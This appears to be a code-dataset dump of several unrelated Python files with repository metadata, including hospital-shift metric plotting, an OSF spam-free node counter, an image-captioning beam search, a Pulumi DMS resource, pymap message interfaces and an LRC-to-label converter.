hosp_all_pairs_tval = pd.melt(hosp_pair_tval.reset_index(), id_vars='index')
hosp_all_pairs_tval.columns = ['Source','Target','MMD']
if dr == DimensionalityReduction.NoRed.value: # TODO run auc smr plots only once in dr_techniques_plot
h_stats_all = hosp_all_pairs_tval
for metric_idx in range(NUM_METRICS):
if metric_names[metric_idx] in ['csdiff', 'cs', 'fnrsign', 'csdispsign', 'aucdispsign']:
cmap = sns.color_palette("vlag", as_cmap=True)
elif metric_names[metric_idx] in ['aucdiff', 'auc']:
cmap = sns.color_palette("rocket", as_cmap=True)
else:
cmap = sns.color_palette("rocket_r", as_cmap=True)
metric_name = metric_names[metric_idx].replace('_', '\_')
feats_shifts_samples_metric = samples_shifts_rands_feats_hosp_pairs_te_acc[si,shift_idx,:,feature_group_idx,:,:,metric_idx]
mean_te_metric = np.mean(feats_shifts_samples_metric, axis=0)
std_te_metric = np.std(feats_shifts_samples_metric, axis=0)
# hosp_avg_metric = mean_te_metric.mean(axis=1)
# hosp_min_metric = mean_te_metric.min(axis=1)
hosp_pair_metric = pd.DataFrame(mean_te_metric, columns=HospitalIDsColnames, index=HospitalIDsColnames)
hosp_pair_metric.to_csv("%s/%s_%s_%s_%s_%s_df.csv" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample, metric_name), index=True)
# cmap = sns.cubehelix_palette(50, hue=0.05, rot=0, light=0.9, dark=0, as_cmap=True)
center, vmin, vmax = None, None, None
if not use_group:
if metric_names[metric_idx] in ['csdisp', 'aucdisp', 'fnr']:
center, vmin, vmax = None, None, np.nanpercentile(mean_te_metric,97.5)
elif metric_names[metric_idx] in ['csdispsign', 'aucdispsign', 'fnrsign', 'fnrmin', 'fnrmaj']:
center, vmin, vmax = 0, np.nanpercentile(mean_te_metric,2.5), np.nanpercentile(mean_te_metric,97.5)
elif metric_names[metric_idx] in ['csmin', 'csmaj']:
center, vmin, vmax = 1, np.nanpercentile(mean_te_metric,2.5), np.nanpercentile(mean_te_metric,97.5)
fig = sns.heatmap(hosp_pair_metric, linewidths=0.5, cmap=cmap, center=center, vmin=vmin, vmax=vmax)
xlabel_text = 'Test Hospital ID'
ylabel_text = 'Train Hospital ID'
if use_group and group_type=='regions':
xlabel_text = 'Test Region'
ylabel_text = 'Train Region'
elif use_group and group_type in ['beds', 'regions_beds', 'regions_beds_teaching']:
xlabel_text = 'Test Category'
ylabel_text = 'Train Category'
plt.xlabel(xlabel_text)
plt.ylabel(ylabel_text)
if not use_group:
plt.xticks(rotation=30)
plt.savefig("%s/%s_%s_%s_%s_%s_hmp.pdf" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample, metric_name), bbox_inches='tight')
plt.clf()
hosp_all_pairs_metric = pd.melt(hosp_pair_metric.reset_index(), id_vars='index')
hosp_all_pairs_metric.columns = ['Source','Target',metric_name]
h_stats_all = h_stats_all.merge(hosp_all_pairs_metric, how='left',
left_on=['Source','Target'], right_on = ['Source','Target'])
# plot only across hospital results
h_stats_all = h_stats_all[h_stats_all.Source!=h_stats_all.Target]
for metric_idx in range(NUM_METRICS):
metric_name = metric_names[metric_idx].replace('_', '\_')
fig = sns.regplot(data=h_stats_all, x='MMD', y=metric_name, scatter_kws={"s": 80, 'alpha':0.6}, truncate=False)
try:
corr_coef, pval_corr_coef = stats.pearsonr(h_stats_all['MMD'], h_stats_all[metric_name])
except ValueError as err:
print(feature_group, metric_name)
print(err)
corr_coef = 0.0
pval_corr_coef = 1.0
textstr = '\n'.join((
r'Pearson corr.=%.4f' % (corr_coef, ),
r'p-val=%.4f' % (pval_corr_coef, )))
# these are matplotlib.patch.Patch properties
props = dict(boxstyle='round', facecolor='white', alpha=0.5)
# place a text box in upper left in axes coords
fig.text(0.5, 0.95, textstr, transform=fig.transAxes, fontsize=14,
verticalalignment='top', bbox=props)
plt.xlabel('$MMD^2$')
plt.ylabel('Generalization gap in {}'.format(metric_name))
plt.savefig("%s/%s_%s_%s_%s_mmd_%s_scatter.pdf" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample, metric_name), bbox_inches='tight')
plt.clf()
h_stats_all.to_csv("%s/hstats_all_%s_%s_%s_%s_df.csv" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample), index=True)
| 59.430407
| 269
| 0.646285
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 8,601
| 0.309901
|
3c57f29eb95c40842b9781c30c39516ef8329161
| 1,285
|
py
|
Python
|
scripts/remove_after_use/create_spam_node_count_csv.py
|
caseyrollins/osf.io
|
e42e566f303d09b54f4025517031b08f404592eb
|
[
"Apache-2.0"
] | 1
|
2019-12-23T04:30:20.000Z
|
2019-12-23T04:30:20.000Z
|
scripts/remove_after_use/create_spam_node_count_csv.py
|
caseyrollins/osf.io
|
e42e566f303d09b54f4025517031b08f404592eb
|
[
"Apache-2.0"
] | null | null | null |
scripts/remove_after_use/create_spam_node_count_csv.py
|
caseyrollins/osf.io
|
e42e566f303d09b54f4025517031b08f404592eb
|
[
"Apache-2.0"
] | null | null | null |
import sys
import csv
import logging
import datetime
from website.app import setup_django
setup_django()
from osf.models import Node, SpamStatus
from django.db.models import Count
from scripts import utils as script_utils
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
def main():
dry_run = '--dry' in sys.argv
if not dry_run:
script_utils.add_file_logger(logger, __file__)
nodes_excluding_spam = Node.objects.filter(is_deleted=False, created__gte=datetime.datetime(2018, 3, 14)).exclude(spam_status__in=[SpamStatus.SPAM, SpamStatus.FLAGGED])
# The extra statement here is to round down the datetimes so we can count by dates only
data = nodes_excluding_spam.extra({'date_created': 'date(created)'}).values('date_created').annotate(count=Count('id')).order_by('date_created')
with open('spamless_node_count_through_2018_3_14.csv', mode='w') as csv_file:
fieldnames = ['date_created', 'count']
writer = csv.DictWriter(csv_file, fieldnames=fieldnames)
if not dry_run:
writer.writeheader()
for data_point in data:
writer.writerow(data_point)
logger.info('Writing csv data for {} dates'.format(data.count()))
if __name__ == '__main__':
main()
| 32.125
| 173
| 0.721401
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 263
| 0.204669
|
3c583e3a31b0df8d7782674e1b493230037e47ae
| 780
|
py
|
Python
|
setup.py
|
greschd/aiida-pytest-mock-codes
|
0d104fbad481c6dd2e5a0725e65dc2208fb8058b
|
[
"MIT"
] | 2
|
2020-02-27T16:52:54.000Z
|
2021-07-17T09:07:28.000Z
|
setup.py
|
greschd/aiida-pytest-mock-codes
|
0d104fbad481c6dd2e5a0725e65dc2208fb8058b
|
[
"MIT"
] | 31
|
2020-02-27T10:51:27.000Z
|
2022-03-04T11:24:26.000Z
|
setup.py
|
greschd/aiida-pytest-mock-codes
|
0d104fbad481c6dd2e5a0725e65dc2208fb8058b
|
[
"MIT"
] | 5
|
2020-02-27T13:31:42.000Z
|
2022-01-31T18:49:06.000Z
|
#!/usr/bin/env python
"""Set up aiida-testing package."""
import os
import warnings
import setuptools
from setuptools.config import read_configuration
try:
import fastentrypoints # NOQA # pylint: disable=unused-import
except ImportError:
warnings.warn(
"The 'fastentrypoints' module could not be loaded. "
"Installed console script will be slower."
)
SETUP_CONFIG_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'setup.cfg')
SETUP_KWARGS = read_configuration(SETUP_CONFIG_PATH)
EXTRAS_REQUIRE = SETUP_KWARGS['options']['extras_require']
EXTRAS_REQUIRE['dev'] = (
EXTRAS_REQUIRE["docs"] + EXTRAS_REQUIRE["testing"] + EXTRAS_REQUIRE["pre_commit"]
)
if __name__ == "__main__":
setuptools.setup(extras_require=EXTRAS_REQUIRE)
| 30
| 89
| 0.744872
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 267
| 0.342308
|
3c595afdb533a0fc9550d6782a8298265522f096
| 8,299
|
py
|
Python
|
inference.py
|
biswaroop1547/Neural_Fashion_Caption_Creator
|
35ca0b4b9813ed570bdde7f4f0911c9f9a1d998e
|
[
"MIT"
] | 3
|
2021-04-12T02:23:18.000Z
|
2022-01-06T12:05:24.000Z
|
inference.py
|
biswaroop1547/Neural_Fashion_Caption_Creator
|
35ca0b4b9813ed570bdde7f4f0911c9f9a1d998e
|
[
"MIT"
] | null | null | null |
inference.py
|
biswaroop1547/Neural_Fashion_Caption_Creator
|
35ca0b4b9813ed570bdde7f4f0911c9f9a1d998e
|
[
"MIT"
] | null | null | null |
import os
import time
import h5py
import json
from PIL import Image
import torch
from torch import nn
import torchvision
import torchvision.transforms as transforms
import torch.optim
import torch.nn.functional as F
from torch.utils.data.dataset import random_split
from torch.utils.data import Dataset
from torch.nn.utils.rnn import pack_padded_sequence
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.utils import class_weight
from tqdm.notebook import tqdm
import matplotlib.cm as cm
import torch.backends.cudnn as cudnn
import torch.utils.data
import skimage.transform
from scipy.misc import imread, imresize
device = torch.device("cpu")
def caption_image(encoder, decoder, image_path, word_map, beam_size=3):
"""
Reads an image and captions it with beam search.
Input:
:param encoder: encoder model
:param decoder: decoder model
:param image_path: path to image
:param word_map: word map(word to index mapping)
:param beam_size: number of sequences to consider at each decode-step
Output:
:return: caption, weights for visualization
"""
k = beam_size
vocab_size = len(word_map)
## Read image and process
img = imread(image_path)
if len(img.shape) == 2:
img = img[:, :, np.newaxis]
img = np.concatenate([img, img, img], axis=2)
img = imresize(img, (256, 256))
img = img.transpose(2, 0, 1)
img = img / 255.
img = torch.FloatTensor(img).to(device)
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
transform = transforms.Compose([normalize])
image = transform(img) # (3, 256, 256)
# Encode
# (1, 3, 256, 256)
image = image.unsqueeze(0)
#(1, enc_image_size, enc_image_size, encoder_dim)
#(1, 14, 14, 2048)
encoder_out = encoder(image)
enc_image_size = encoder_out.size(1)
encoder_dim = encoder_out.size(3)
# Flatten encoding
# (1, num_pixels, encoder_dim)
# (1, 196, 2048)
encoder_out = encoder_out.view(1, -1, encoder_dim)
num_pixels = encoder_out.size(1)
# We'll treat the problem as having a batch size of k
# (k, num_pixels, encoder_dim)
encoder_out = encoder_out.expand(k, num_pixels, encoder_dim)
# Tensor to store top k previous words at each step; now they're just <start>
k_prev_words = torch.LongTensor([[word_map['<start>']]] * k).to(device) # (k, 1)
# Tensor to store top k sequences; now they're just <start>
# (k, 1)
seqs = k_prev_words
# Tensor to store top k sequences scores; now they're just 0
top_k_scores = torch.zeros(k, 1).to(device) # (k, 1)
# Tensor to store top k sequences alphas; now they're just 1s
# (k, 1, enc_image_size, enc_image_size)
seqs_alpha = torch.ones(k, 1, enc_image_size, enc_image_size).to(device)
# Lists to store completed sequences, their alphas and scores
complete_seqs = list()
complete_seqs_alpha = list()
complete_seqs_scores = list()
# Start decoding
step = 1
h, c = decoder.init_hidden_state(encoder_out)
# s is a number less than or equal to k,
# because sequences are removed from this process once they hit <end>
while True:
# (s, embed_dim)
embeddings = decoder.embedding(k_prev_words).squeeze(1)
# (s, encoder_dim), (s, num_pixels)
awe, alpha = decoder.attention(encoder_out, h)
# (s, enc_image_size, enc_image_size)
alpha = alpha.view(-1, enc_image_size, enc_image_size)
# gating scalar, (s, encoder_dim)
gate = decoder.sigmoid(decoder.f_beta(h))
awe = gate * awe
# (s, decoder_dim)
h, c = decoder.decode_step(torch.cat([embeddings, awe], dim=1), (h, c))
# (s, vocab_size)
scores = decoder.fc(h)
scores = F.log_softmax(scores, dim=1)
# Add
scores = top_k_scores.expand_as(scores) + scores # (s, vocab_size)
# For the first step, all k points will have the same scores (since same k previous words, h, c)
if step == 1:
top_k_scores, top_k_words = scores[0].topk(k, 0, True, True) # (s)
else:
# Unroll and find top scores, and their unrolled indices
top_k_scores, top_k_words = scores.view(-1).topk(k, 0, True, True) # (s)
# print(top_k_words)
# Convert unrolled indices to actual indices of scores
prev_word_inds = top_k_words // vocab_size # (s)
next_word_inds = top_k_words % vocab_size # (s)
# print(seqs[prev_word_inds])
# Add new words to sequences, alphas
seqs = torch.cat([seqs[prev_word_inds], next_word_inds.unsqueeze(1)], dim=1) # (s, step+1)
seqs_alpha = torch.cat([seqs_alpha[prev_word_inds], alpha[prev_word_inds].unsqueeze(1)],
dim=1) # (s, step+1, enc_image_size, enc_image_size)
# Which sequences are incomplete (didn't reach <end>)?
incomplete_inds = [ind for ind, next_word in enumerate(next_word_inds) if
next_word != word_map['<end>']]
## will be empty if none of them have reached <end>
complete_inds = list(set(range(len(next_word_inds))) - set(incomplete_inds))
# Set aside complete sequences
if len(complete_inds) > 0:
complete_seqs.extend(seqs[complete_inds].tolist())
complete_seqs_alpha.extend(seqs_alpha[complete_inds].tolist())
complete_seqs_scores.extend(top_k_scores[complete_inds])
k -= len(complete_inds) # reduce beam length accordingly
# Proceed with incomplete sequences
if k == 0:
break
seqs = seqs[incomplete_inds]
seqs_alpha = seqs_alpha[incomplete_inds]
### updating h's and c's for incomplete sequences
h = h[prev_word_inds[incomplete_inds]]
c = c[prev_word_inds[incomplete_inds]]
encoder_out = encoder_out[prev_word_inds[incomplete_inds]]
top_k_scores = top_k_scores[incomplete_inds].unsqueeze(1)
k_prev_words = next_word_inds[incomplete_inds].unsqueeze(1)
# Break if things have been going on too long
if step > 40:
break
step += 1
# print(complete_seqs)
i = complete_seqs_scores.index(max(complete_seqs_scores))
seq = complete_seqs[i]
alphas = complete_seqs_alpha[i]
return seq, alphas
# def visualize_att(image_path, seq, alphas, rev_word_map, smooth=False):
# """
# Visualizes caption with weights at every word.
# Adapted from paper authors' repo: https://github.com/kelvinxu/arctic-captions/blob/master/alpha_visualization.ipynb
# :param image_path: path to image
# :param seq: generated caption
# :param alphas: attention weights for every time steps
# :param rev_word_map: reverse word mapping, i.e. ix2word
# :param smooth: smooth weights?
# """
# image = Image.open(image_path)
# image = image.resize([14 * 14, 14 * 14], Image.LANCZOS)
# words = [rev_word_map[ind] for ind in seq]
# figures = []
# for t in range(len(words)):
# fig = plt.figure()
# if t > 50:
# break
# #plt.subplot(np.ceil(len(words) / 5.), 5, t + 1)
# fig.text(0, 1, '%s' % (words[t]), color='black', backgroundcolor='white', fontsize=12)
# plt.imshow(image)
# current_alpha = alphas[t, :]
# if smooth:
# alpha = skimage.transform.pyramid_expand(current_alpha.numpy(), upscale=14, sigma=8)
# else:
# alpha = skimage.transform.resize(current_alpha.numpy(), [14 * 14, 14 * 14])
# if t == 0:
# plt.imshow(alpha, alpha=0)
# else:
# plt.imshow(alpha, alpha=0.8)
# plt.set_cmap(cm.Greys_r)
# plt.axis('off')
# figures.append(fig)
# #plt.savefig("horse_riding/"+words[t]+ str(t)+'.png', bbox_inches = 'tight', pad_inches = 0)
# plt.show()
| 32.291829
| 121
| 0.616821
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,571
| 0.430293
|
3c599676a9ae26a258559d911189a12f55452ddf
| 666
|
py
|
Python
|
src/yellowdog_client/model/internal_user.py
|
yellowdog/yellowdog-sdk-python-public
|
da69a7d6e45c92933e34fefcaef8b5d98dcd6036
|
[
"Apache-2.0"
] | null | null | null |
src/yellowdog_client/model/internal_user.py
|
yellowdog/yellowdog-sdk-python-public
|
da69a7d6e45c92933e34fefcaef8b5d98dcd6036
|
[
"Apache-2.0"
] | null | null | null |
src/yellowdog_client/model/internal_user.py
|
yellowdog/yellowdog-sdk-python-public
|
da69a7d6e45c92933e34fefcaef8b5d98dcd6036
|
[
"Apache-2.0"
] | null | null | null |
from dataclasses import dataclass, field
from typing import List, Optional
from .access_delegate import AccessDelegate
from .password_state import PasswordState
from .user import User
@dataclass
class InternalUser(User):
"""Represents an internal user within the YellowDog Platform."""
type: str = field(default="co.yellowdog.platform.model.InternalUser", init=False)
id: Optional[str] = field(default=None, init=False)
passwordState: Optional[PasswordState] = field(default=None, init=False)
username: str
name: str
email: Optional[str] = None
eulaAccepted: bool = False
accessDelegates: Optional[List[AccessDelegate]] = None
| 33.3
| 85
| 0.753754
| 467
| 0.701201
| 0
| 0
| 478
| 0.717718
| 0
| 0
| 106
| 0.159159
|
3c59b7068b704fe1f1c47ee7e6a0b30a676e031e
| 6,891
|
py
|
Python
|
sdk/python/pulumi_aws/dms/replication_task.py
|
pulumi-bot/pulumi-aws
|
756c60135851e015232043c8206567101b8ebd85
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/dms/replication_task.py
|
pulumi-bot/pulumi-aws
|
756c60135851e015232043c8206567101b8ebd85
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/dms/replication_task.py
|
pulumi-bot/pulumi-aws
|
756c60135851e015232043c8206567101b8ebd85
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import pulumi
import pulumi.runtime
class ReplicationTask(pulumi.CustomResource):
"""
Provides a DMS (Data Migration Service) replication task resource. DMS replication tasks can be created, updated, deleted, and imported.
"""
def __init__(__self__, __name__, __opts__=None, cdc_start_time=None, migration_type=None, replication_instance_arn=None, replication_task_id=None, replication_task_settings=None, source_endpoint_arn=None, table_mappings=None, tags=None, target_endpoint_arn=None):
"""Create a ReplicationTask resource with the given unique name, props, and options."""
if not __name__:
raise TypeError('Missing resource name argument (for URN creation)')
if not isinstance(__name__, basestring):
raise TypeError('Expected resource name to be a string')
if __opts__ and not isinstance(__opts__, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
__props__ = dict()
if cdc_start_time and not isinstance(cdc_start_time, basestring):
raise TypeError('Expected property cdc_start_time to be a basestring')
__self__.cdc_start_time = cdc_start_time
"""
The Unix timestamp integer for the start of the Change Data Capture (CDC) operation.
"""
__props__['cdcStartTime'] = cdc_start_time
if not migration_type:
raise TypeError('Missing required property migration_type')
elif not isinstance(migration_type, basestring):
raise TypeError('Expected property migration_type to be a basestring')
__self__.migration_type = migration_type
"""
The migration type. Can be one of `full-load | cdc | full-load-and-cdc`.
"""
__props__['migrationType'] = migration_type
if not replication_instance_arn:
raise TypeError('Missing required property replication_instance_arn')
elif not isinstance(replication_instance_arn, basestring):
raise TypeError('Expected property replication_instance_arn to be a basestring')
__self__.replication_instance_arn = replication_instance_arn
"""
The Amazon Resource Name (ARN) of the replication instance.
"""
__props__['replicationInstanceArn'] = replication_instance_arn
if not replication_task_id:
raise TypeError('Missing required property replication_task_id')
elif not isinstance(replication_task_id, basestring):
raise TypeError('Expected property replication_task_id to be a basestring')
__self__.replication_task_id = replication_task_id
"""
The replication task identifier.
"""
__props__['replicationTaskId'] = replication_task_id
if replication_task_settings and not isinstance(replication_task_settings, basestring):
raise TypeError('Expected property replication_task_settings to be a basestring')
__self__.replication_task_settings = replication_task_settings
"""
An escaped JSON string that contains the task settings. For a complete list of task settings, see [Task Settings for AWS Database Migration Service Tasks](http://docs.aws.amazon.com/dms/latest/userguide/CHAP_Tasks.CustomizingTasks.TaskSettings.html).
"""
__props__['replicationTaskSettings'] = replication_task_settings
if not source_endpoint_arn:
raise TypeError('Missing required property source_endpoint_arn')
elif not isinstance(source_endpoint_arn, basestring):
raise TypeError('Expected property source_endpoint_arn to be a basestring')
__self__.source_endpoint_arn = source_endpoint_arn
"""
The Amazon Resource Name (ARN) string that uniquely identifies the source endpoint.
"""
__props__['sourceEndpointArn'] = source_endpoint_arn
if not table_mappings:
raise TypeError('Missing required property table_mappings')
elif not isinstance(table_mappings, basestring):
raise TypeError('Expected property table_mappings to be a basestring')
__self__.table_mappings = table_mappings
"""
An escaped JSON string that contains the table mappings. For information on table mapping see [Using Table Mapping with an AWS Database Migration Service Task to Select and Filter Data](http://docs.aws.amazon.com/dms/latest/userguide/CHAP_Tasks.CustomizingTasks.TableMapping.html)
"""
__props__['tableMappings'] = table_mappings
if tags and not isinstance(tags, dict):
raise TypeError('Expected property tags to be a dict')
__self__.tags = tags
"""
A mapping of tags to assign to the resource.
"""
__props__['tags'] = tags
if not target_endpoint_arn:
raise TypeError('Missing required property target_endpoint_arn')
elif not isinstance(target_endpoint_arn, basestring):
raise TypeError('Expected property target_endpoint_arn to be a basestring')
__self__.target_endpoint_arn = target_endpoint_arn
"""
The Amazon Resource Name (ARN) string that uniquely identifies the target endpoint.
"""
__props__['targetEndpointArn'] = target_endpoint_arn
__self__.replication_task_arn = pulumi.runtime.UNKNOWN
"""
The Amazon Resource Name (ARN) for the replication task.
"""
super(ReplicationTask, __self__).__init__(
'aws:dms/replicationTask:ReplicationTask',
__name__,
__props__,
__opts__)
def set_outputs(self, outs):
if 'cdcStartTime' in outs:
self.cdc_start_time = outs['cdcStartTime']
if 'migrationType' in outs:
self.migration_type = outs['migrationType']
if 'replicationInstanceArn' in outs:
self.replication_instance_arn = outs['replicationInstanceArn']
if 'replicationTaskArn' in outs:
self.replication_task_arn = outs['replicationTaskArn']
if 'replicationTaskId' in outs:
self.replication_task_id = outs['replicationTaskId']
if 'replicationTaskSettings' in outs:
self.replication_task_settings = outs['replicationTaskSettings']
if 'sourceEndpointArn' in outs:
self.source_endpoint_arn = outs['sourceEndpointArn']
if 'tableMappings' in outs:
self.table_mappings = outs['tableMappings']
if 'tags' in outs:
self.tags = outs['tags']
if 'targetEndpointArn' in outs:
self.target_endpoint_arn = outs['targetEndpointArn']
| 49.57554
| 288
| 0.689015
| 6,668
| 0.967639
| 0
| 0
| 0
| 0
| 0
| 0
| 3,176
| 0.460891
|
3c5b0b5866a106b628ab68aee24923fb36a181b9
| 8,674
|
py
|
Python
|
pymap/interfaces/message.py
|
BoniLindsley/pymap
|
b3190d20799a6d342888e51bfc55cdfcbfe3ed26
|
[
"MIT"
] | 18
|
2015-06-04T21:09:37.000Z
|
2022-03-04T08:14:31.000Z
|
pymap/interfaces/message.py
|
BoniLindsley/pymap
|
b3190d20799a6d342888e51bfc55cdfcbfe3ed26
|
[
"MIT"
] | 114
|
2018-10-17T23:11:00.000Z
|
2022-03-19T16:59:16.000Z
|
pymap/interfaces/message.py
|
BoniLindsley/pymap
|
b3190d20799a6d342888e51bfc55cdfcbfe3ed26
|
[
"MIT"
] | 8
|
2015-02-03T19:30:52.000Z
|
2021-11-20T12:47:03.000Z
|
from __future__ import annotations
from abc import abstractmethod
from collections.abc import Collection, Sequence
from datetime import datetime
from typing import TypeVar, Protocol
from ..bytes import Writeable
from ..flags import SessionFlags
from ..parsing.response.fetch import EnvelopeStructure, BodyStructure
from ..parsing.specials import Flag, ObjectId, FetchRequirement
__all__ = ['MessageT', 'MessageT_co', 'FlagsKey', 'CachedMessage',
'MessageInterface', 'LoadedMessageInterface']
#: Type variable with an upper bound of :class:`MessageInterface`.
MessageT = TypeVar('MessageT', bound='MessageInterface')
#: Covariant type variable with an upper bound of :class:`MessageInterface`.
MessageT_co = TypeVar('MessageT_co', bound='MessageInterface', covariant=True)
#: Type alias for the value used as a key in set comparisons detecting flag
#: updates.
FlagsKey = tuple[int, frozenset[Flag]]
class CachedMessage(Protocol):
"""Cached message metadata used to track state changes. Used to produce
untagged FETCH responses when a message's flags have changed, or when a
FETCH command requests metadata of an expunged message before its untagged
EXPUNGE response has been sent.
This is intended to be compatible with :class:`MessageInterface`, and
should be implemented by the same classes in most cases.
"""
__slots__: Sequence[str] = []
@property
@abstractmethod
def uid(self) -> int:
"""The message's unique identifier in the mailbox."""
...
@property
@abstractmethod
def internal_date(self) -> datetime:
"""The message's internal date."""
...
@property
@abstractmethod
def permanent_flags(self) -> frozenset[Flag]:
"""The permanent flags for the message."""
...
@property
@abstractmethod
def email_id(self) -> ObjectId:
"""The message's email object ID."""
...
@property
@abstractmethod
def thread_id(self) -> ObjectId:
"""The message's thread object ID."""
...
@property
@abstractmethod
def flags_key(self) -> FlagsKey:
"""Hashable value that represents the current flags of this
message, used for detecting mailbox updates.
"""
...
@abstractmethod
def get_flags(self, session_flags: SessionFlags) -> frozenset[Flag]:
"""Get the full set of permanent and session flags for the message.
Args:
session_flags: The current session flags.
"""
...
class MessageInterface(Protocol):
"""Message data such as UID, permanent flags, and when the message was
added to the system.
"""
__slots__: Sequence[str] = []
@property
@abstractmethod
def uid(self) -> int:
"""The message's unique identifier in the mailbox."""
...
@property
@abstractmethod
def expunged(self) -> bool:
"""True if this message has been expunged from the mailbox."""
...
@property
@abstractmethod
def internal_date(self) -> datetime:
"""The message's internal date."""
...
@property
@abstractmethod
def permanent_flags(self) -> frozenset[Flag]:
"""The permanent flags for the message."""
...
@property
@abstractmethod
def email_id(self) -> ObjectId:
"""The message's email object ID, which can identify its content.
See Also:
`RFC 8474 5.1. <https://tools.ietf.org/html/rfc8474#section-5.1>`_
"""
...
@property
@abstractmethod
def thread_id(self) -> ObjectId:
"""The message's thread object ID, which groups messages together.
See Also:
`RFC 8474 5.2. <https://tools.ietf.org/html/rfc8474#section-5.2>`_
"""
...
@abstractmethod
def get_flags(self, session_flags: SessionFlags) -> frozenset[Flag]:
"""Get the full set of permanent and session flags for the message.
Args:
session_flags: The current session flags.
"""
...
@abstractmethod
async def load_content(self, requirement: FetchRequirement) \
-> LoadedMessageInterface:
"""Loads the content of the message.
Args:
requirement: The data required from the message content.
"""
...
class LoadedMessageInterface(Protocol):
"""The loaded message content, which may include the header, the body,
both, or neither, depending on the requirements.
It is assumed that this object contains the entire content in-memory. As
such, when multiple :class:`MessageInterface` objects are being processed,
only one :class:`LoadedMessageInterface` should be in scope at a time.
"""
__slots__: Sequence[str] = []
@property
@abstractmethod
def requirement(self) -> FetchRequirement:
"""The :class:`~pymap.parsing.specials.FetchRequirement` used to load
the message content.
"""
...
@abstractmethod
def __bytes__(self) -> bytes:
...
@abstractmethod
def get_header(self, name: bytes) -> Sequence[str]:
"""Get the values of a header from the message.
Args:
name: The name of the header.
"""
...
@abstractmethod
def get_headers(self, section: Sequence[int]) -> Writeable:
"""Get the headers from the message part.
The ``section`` argument indexes a nested sub-part of the message. For
example, ``[2, 3]`` would get the 2nd sub-part of the message and then
index it for its 3rd sub-part.
Args:
section: Nested list of sub-part indexes.
"""
...
@abstractmethod
def get_message_headers(self, section: Sequence[int] = None,
subset: Collection[bytes] = None,
inverse: bool = False) -> Writeable:
"""Get the headers from the message or a ``message/rfc822`` sub-part of
the message..
The ``section`` argument can index a nested sub-part of the message.
For example, ``[2, 3]`` would get the 2nd sub-part of the message and
then index it for its 3rd sub-part.
Args:
section: Optional nested list of sub-part indexes.
subset: Subset of headers to get.
inverse: If ``subset`` is given, this flag will invert it so that
the headers *not* in ``subset`` are returned.
"""
...
@abstractmethod
def get_message_text(self, section: Sequence[int] = None) -> Writeable:
"""Get the text of the message part, not including headers.
The ``section`` argument can index a nested sub-part of the message.
For example, ``[2, 3]`` would get the 2nd sub-part of the message and
then index it for its 3rd sub-part.
Args:
section: Optional nested list of sub-part indexes.
"""
...
@abstractmethod
def get_body(self, section: Sequence[int] = None,
binary: bool = False) -> Writeable:
"""Get the full body of the message part, including headers.
The ``section`` argument can index a nested sub-part of the message.
For example, ``[2, 3]`` would get the 2nd sub-part of the message and
then index it for its 3rd sub-part.
Args:
section: Optional nested list of sub-part indexes.
binary: True if the result has decoded any
Content-Transfer-Encoding.
"""
...
@abstractmethod
def get_size(self, section: Sequence[int] = None) -> int:
"""Return the size of the message, in octets.
Args:
section: Optional nested list of sub-part indexes.
"""
...
@abstractmethod
def get_envelope_structure(self) -> EnvelopeStructure:
"""Build and return the envelope structure.
See Also:
`RFC 3501 2.3.5.
<https://tools.ietf.org/html/rfc3501#section-2.3.5>`_
"""
...
@abstractmethod
def get_body_structure(self) -> BodyStructure:
"""Build and return the body structure.
See Also:
`RFC 3501 2.3.6
<https://tools.ietf.org/html/rfc3501#section-2.3.6>`_
"""
...
@abstractmethod
def contains(self, value: bytes) -> bool:
"""Check the body of the message for a sub-string. This may be
optimized to only search headers and ``text/*`` MIME parts.
Args:
value: The sub-string to find.
"""
...
| 28.071197
| 79
| 0.613212
| 7,748
| 0.893244
| 0
| 0
| 6,495
| 0.748789
| 254
| 0.029283
| 5,144
| 0.593037
|
3c5b1d85968d78e7d6653a282357a7d53ef86e80
| 623
|
py
|
Python
|
auxiliary-scripts/LRC-to-Label.py
|
xbnstudios/show-scripts
|
fb2eb5bb41eadc9757567fb6b1217d6c2bad0620
|
[
"Unlicense"
] | 1
|
2018-03-08T16:00:31.000Z
|
2018-03-08T16:00:31.000Z
|
auxiliary-scripts/LRC-to-Label.py
|
ManualManul/XBN
|
fb2eb5bb41eadc9757567fb6b1217d6c2bad0620
|
[
"Unlicense"
] | null | null | null |
auxiliary-scripts/LRC-to-Label.py
|
ManualManul/XBN
|
fb2eb5bb41eadc9757567fb6b1217d6c2bad0620
|
[
"Unlicense"
] | null | null | null |
import glob
for file in glob.glob("*.lrc"):
filename = file[0:7] # assume fnt-xxx.lrc file format
lrc_file = open(file, encoding="utf-8")
lrc_lines = lrc_file.readlines()
lrc_file.close()
label = open(filename + '.txt', 'w', encoding="utf-8")
print(filename)
for line in lrc_lines[3:]:
time = line[line.find("[")+1:line.find("]")].replace('.', ':').split(':')
labeltime = str(int(time[0]) * 60 + int(time[1])) + '.' + time[2] + '0000'
title = line.split(']',1)[1].rstrip('\n')
label.write(labeltime + ' ' + labeltime + ' ' + title + '\n')
label.close()
| 31.15
| 82
| 0.552167
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 103
| 0.165329
|
3c5b46fd9008363f42f8cbdbddac0fafdcddf679
| 2,750
|
py
|
Python
|
driving/boost_grab.py
|
Chadc265/DingusBot
|
98a05fe6ef75e2b48038f9fbbfacc204e89d0d86
|
[
"MIT"
